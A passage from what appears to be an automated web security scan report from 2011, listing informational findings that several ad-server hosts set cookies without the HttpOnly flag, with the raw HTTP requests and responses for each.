yjL@!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!$<yjL@!#fG+!!!!%<yjL@!#g=!!!!!$<yjL@!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#h.N!!!!#<yMiw!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!$<yjL@!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#uR3!!!!$<yjL@!#ujQ!!!!$<yjL@!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!#<yjL@!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!'<yjL@!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(S9!!!!$<yjL@!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!'<yjL@!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!$<yjL@"; path=/; expires=Wed, 08-May-2013 13:59:17 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 13:59:17 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;
10.15. http://ads.adbrite.com/adserver/vdi/742697  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/742697?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; b="%3A%3Axews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; ut="1%3AXZFJtsIgEEX3wjgDGtMcdxMEE35oQhNzorh3AX88xumtW6%2Bq4AFuGJwfYOLbahzz4AzcKtUSkVW%2BbSOKsMrAZzC3rIDLOHaDhf0tQTkEFXGklRdCk2xRWNoi%2BptgdnU94ToM7xJPLmaVteS%2BJtIRJxNB9e5dzcHbqTpQL7mUidCwmtjGhpKPqH%2FaZSO25pQpg4ss2%2FuJhDlrVqOy6EmZtKhTRpfhlnX%2FV5ZIUR9n95j1%2Be6x8%2B8zF5MysXcpbN6uWsdURuG%2BvxLHuX%2BEw1do016%2BQ0EFaK81d6J8AHg%2BXw%3D%3D"; fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C86xtm%2C1uo0%7Clkkk10%2C86egg%2C1uo0%7Clkkk0s%2C873x5%2C1uo0%7Clkkz7b%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C8413g%2C1uo0%7Clkl4dq%2C86eg6%2C1uo0%7Clkkk0h%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh%7Clkkz71"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 09 May 2011 14:00:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 10-May-2011 14:00:11 GMT
Set-Cookie: rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcYm9WOzw4iEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; path=/; domain=.adbrite.com; expires=Sun, 07-Aug-2011 14:00:11 GMT
Set-Cookie: ut="1%3AXZDJloMgEEX%2FhbULhiie%2FI0EokQGGRKPCfn3Bjr2ib293Ee9qhd4YHB%2BgVlsq%2FU8gDPwq9L3hJwOlCaUYFNAKGChvILLNPWjg8MjQzVGnXBiTZDSkGIxWGMJ3WZYXNPOuI3j75PILuaNc%2BS5ZtITrzJB7e5d7cHbqT7QoIRSmbC42kRTx8ifaP7FVSe37lQoh3dV24eZxKVozqBa9KRtLuq1NXW44%2F1ny%2FqlbI%2BzcfA5tmxXY9KQEIrP%2FR4CF3OC41e8o5fvOGgAG4wRXtZTg%2Ff7Bw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 06-May-2021 14:00:11 GMT
Set-Cookie: vsd=0@1@4dc7f36b@cdn.turn.com; path=/; domain=.adbrite.com; expires=Wed, 11-May-2011 14:00:11 GMT
Set-Cookie: fq=; path=/; domain=.adbrite.com; expires=Mon, 09-May-2011 14:00:11 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
10.16. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1291095E86820110502141346&flash=10&time=1|8:59|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/w%3B240293018%3B0-0%3B1%3B63773644%3B4986-300/600%3B42004857/42022644/1%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Btgt%3Dbrand%3Bcmw%3Dowl%3Bsz%3D300x600%3Bnet%3Dcm%3Bord1%3D680525%3Bcontx%3Dent%3Ban%3D%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3B%7Eaopt%3D2/1/e454/0%3B%7Esscs%3D%3f$CTURL$&r=0.22781705926172435 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CEJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=7DA20400-C8FF-C732-0209-A310000A0200; PRca=|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 13:59:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 11740
Set-Cookie:PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAY0aKAxsCAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D8A20400-6340-8A46-0309-A4900C6C0200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
10.17. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-715901-1023315-725071-1268392-1198035-1049794-1238051-74560-593881-1264419-86237-926097-1006089-1196051-1147048-1086731-1284585-1086733-1044410-1093100-1063912-397181-1044578-1063916-1041270-1049769-1049770-596293-576685-1044587-596291-1049772-1063911-1063910 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; udm_0=MLv39SEpLipv597JcdnUygV6rsvwpilMo4IXeAwquaRyre3gpPYIVAodYIp/pLDnrZ6pzwptsA0XKpUy7HBRG1IKyMiEh4VBn8RQKgHt6xmexyTANa3oP9nI5ve4Zh+cFpisilatsARekr/e1VTo6CfrY9ZOrKU59rPLHnZc0mKVcQ44RykdTAno/P8W1VY/OF5riAyTBWbBY+xYNSljIWcWOOtopIN1ZjQYZDMkgv8oJAkIGrSPg7YITZqDkGM+V0BX4IQvQU/ry0FVeR/RwM2R8eN2xwK8bXMaT8dnyGWiIwmFneP0q3borhBG+xrCFLFiU6qVr79K4V6YQuPzNuqA4/90ta/9VnFUEqhNTnmt1DrgJQOF4r1UEghYGiGgL7M7jrwbHJw9+F3CxjGnvmdNCsiiHDRDAMc/vfIfy1xA8L7rohMERi0dIDuvhqOPWEsI6+gjuwkRt93TDz/gwRoH3pOiO65cSq0JPJXL/eJxXICyA8Awu1c665ElpIHf+S2JzUt2IfmG6UqU7nNeIE7CqJ8wxwMGrI48La943kqanih8S8EHg93VfGjHcj2k0UdI+MOO5SUZtq0HZasWtuROl2/v/L3k3VhfBWMD9MKywUA3DZbUUdwgNu+Bc1D5GVtD/DFSVzHQd+Kthaux21W1VpYQzrJIOJqcfN+uFcepRaoHI2S6F+4MuQoZFMlFeSdfgpOqfSyBUa/S4SRDd2WkicgTYEf8w14nUrumB9cXOOs8IXQ3zkExOY2ILoGKzpi3VyhWA/E7FCSpV8XPeJUC3cephnvWTBkMkrOSNt+1c2G2kN2jJJu+t0Axdqd+gORvzH+Vh/dfmgaAk/YEKClysvExNZvw7tZ83xSC4kxPGUztLFNur6xF7/1lfGbJhpEOwNHvrxxdmXquPa98rGNTJlGE2KuHf96OXfa2fRUSFFdVEch+rdebr5A6GR+T8gEKpv5c/Kj/cUWy28+9cyQtHhLIz7E3JHVNRa1Iit99TBeVrjSUCEBciFZMwaQsrMtGEShvcBgNIKjzOM2bjkPTGk7U3NF9wbb7lKjRgR1a3vT+ePnQqbS+geKekpy0pYHIXkAz8rK/hMKwUUVuz/Sh6MkM2MO3MrV3kkzTtTQNj9q5xFCbt/phR+QzLH9cUhyOm+dQbNmQgiBz650QmznHkzThdkQ9qDa45Zs0ktlIz+ebUsOdl2IUiON4g2mdMKt5PQc62vmcGDUwYCvjBlm1gYSd9xvPi0tU6D3XX+oxjCU/9wnHCjGC8Y9JmhiMEF8QUbZgTzlV7IJD76HT9mUVgokd9gxAOQ==; rsiPus_xqR7="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIshOB9JrGlJ9XZP2PSMq545hyVBVJdSnkgvS5ixQ2jzsY0ZWA+JOFBhqviZCWubV71mmTZ/tW5l+pH2v6yDAOuX7qLwExVNaXzP2AMt2j6L/eVkJ61W1sllb6Nc3moNgaTi0sWkkQCbNz7hXNo2IsC53dW3VuuZsmJb9X0AgiDcheSzlnAsnUq4LYdtCMaskgIpbgmkSHb9PrS66rT7Grgzql7HtldL8iE5xypWITXabh97tTpkU/qmOFPl2cWsADKk2Rc1gNqCs/wCa2GpcRYzsBBlGWu1Rx6Ss0719jAJPt3A0/cgXMK9v1+nMWxleyRS9Py7rbiFbkbA4dy82s+YNiWD1Bp0B/8YPQvjz5m6VsPK2bApJbudN0kRmgDQwBFdNYNT3Zod7YBYp+BG3MVnzNBbnI+yHUMxY8gaTCU7GSuHnVmZTUzeXLyNzdjGXICYBnSWVVzTm1uYa+UU29wqPQ14C9Ay7tt6GPEWSA5zQxfYzeLi20J0Nl7IC6vXnM8Od1ipWmbzVPXl7hr95e/RGmwPBkmqRC5aamjDudjkvgSbR3b42ft+lD1GQzV25ioqJNKAAsRVoMjgqHOtgRDBe0DOKYrT+tMQWMGn6nEChsmBKyFveyHmvauyQe182HvP5WE9xxj/WW1VFGrZH10B6y51pelmZhY2yUVhLbCHFAF1wgg9I1NLCQ22j9FIDUznCf6vIcdZKG8/ZdiKwDfKAnA8AB53vXcXDFW+bqz0Qi9tJP3HFnfYb06h1kepNXQWZKlZVW8wLE6GcYgBaTn7Edmli85qT4S83vxtkUUbMAtf+b0E1nSeX3q+qrQ2YpBw97usUXF9qEw1Kga7ue4/koD8yQel/qNlEjame/tLJ0jduVB+ytBY9sF93mgbUlL2ZeG9dCIkZ+m+iWAynUZGRAG3mH4zdRt6Q